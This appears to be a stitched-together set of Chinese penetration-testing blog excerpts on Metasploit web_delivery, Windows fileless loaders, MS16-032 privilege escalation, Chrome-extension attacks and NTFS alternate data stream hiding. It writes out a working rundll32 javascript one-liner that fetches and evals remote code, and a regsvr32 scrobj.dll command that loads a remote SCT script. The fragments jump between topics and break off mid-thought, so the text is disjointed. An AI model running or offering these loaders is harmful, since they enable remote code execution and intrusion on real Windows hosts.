之前碰到的问题，自己的主机做了DMZ，设置[b]web_delivery[/b]时，发现将lhost设置成外网ip，则脚本不能运行，如果设置成内网ip，则反弹payload反弹的地址为内网地址，即不可能获取到会话，查看详细配置信息，发现存在 ...

1.默认方式

1

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%

2.Use SCT

运行计算器：

1

regsvr32 /u /s /i:http://urlto/calc.sct scrobj.dll

exploit-db的详情：
https://www.exploit-db.com/exploits/39574/

试用系统：
Tested on x32 Win7, x64 Win8, x64 2k12R2

提权powershell脚本：

Invoke-MS16-032.ps1

测试详情：

0x00 Introduction

众所周知，Web应用变得越来越流行，生活，办公，娱乐等等很多都是通过Web，而浏览器是我们访问Web最常使用的工具之一。随着Web功能的强大，浏览器的功能也变得越来越强大。而此文，就是介绍一种通过Chrome插件进行攻击的姿势跟手法。

撰写此文时，仅对Chrome浏览器进行了部分测试，有兴趣的小伙伴可以深入，本文主要是提供一种思路。

0x01 Write Chrome Extension

在知道怎么写插件之前，我们首先了解一下插件的文件结构，随便下载一个谷歌插件,将其重命名为zip后缀之后进行解压，解压后的文件目录如下：

1.创建一个txt文件，test.txt，随便添加内容（实际的工具，即用户要用的那个工具）。 2.将程序写入文件流（此处用calc.exe） type calc.exe > test.txt:calc.exe 3.使用mklink创建 ...